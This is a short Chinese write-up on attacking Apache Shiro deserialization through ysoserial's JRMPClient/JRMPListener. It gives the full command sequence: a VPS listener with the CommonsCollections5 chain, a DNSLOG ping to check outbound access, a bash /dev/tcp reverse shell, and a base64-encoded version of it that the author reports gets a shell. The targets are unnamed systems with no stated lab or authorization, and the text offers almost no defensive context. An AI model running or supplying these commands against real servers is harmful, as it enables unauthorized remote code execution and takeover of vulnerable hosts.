前言

最近在測(cè)試中遇到一些shiro反序列化不能利用的情況 找到key 無法找到利用鏈，但是發(fā)現(xiàn)存在JRMPClient可用的情況。

換一種工具嘗試

發(fā)現(xiàn) JRMPClient 可用， 嘗試使用 JRMPClient 進(jìn)行測(cè)試，最終這個(gè)目標(biāo)也沒有執(zhí)行成功所以換了一個(gè)目標(biāo)進(jìn)行的嘗試，僅記錄JRMPClient 利用方式。

使用JRMPClient模塊進(jìn)行測(cè)試

找到一個(gè)同樣存在shiro反序列的目標(biāo)。

同樣find: JRMPClient can be use。

搭建JRMPClient 監(jiān)聽服務(wù)

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服務(wù)，下載地址：https://github.com/frohoff/ysoserial

使用DNSLOG進(jìn)行檢測(cè)

在不確定目標(biāo)是否通外網(wǎng)的情況下 先使用DNSLOG進(jìn)行檢測(cè) 獲取一個(gè)新的域名 ：w3dh1h.dnslog.cn

VPS上開啟JRMPListener

在VPS上搭建服務(wù)命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

shiro反序列利用工具中選擇JRMPClient,然后輸入VPS上搭建服務(wù)的地址：

JRMPListener 收到返回信息

DNSLOG上收到目標(biāo)的ping 命令信息 說明目標(biāo)服務(wù)器通外網(wǎng)

執(zhí)行反彈命令

執(zhí)行反彈命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

沒有收到反彈鏈接

將命令進(jìn)行base64編碼 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

成功收到反彈鏈接

審核編輯：湯梓紅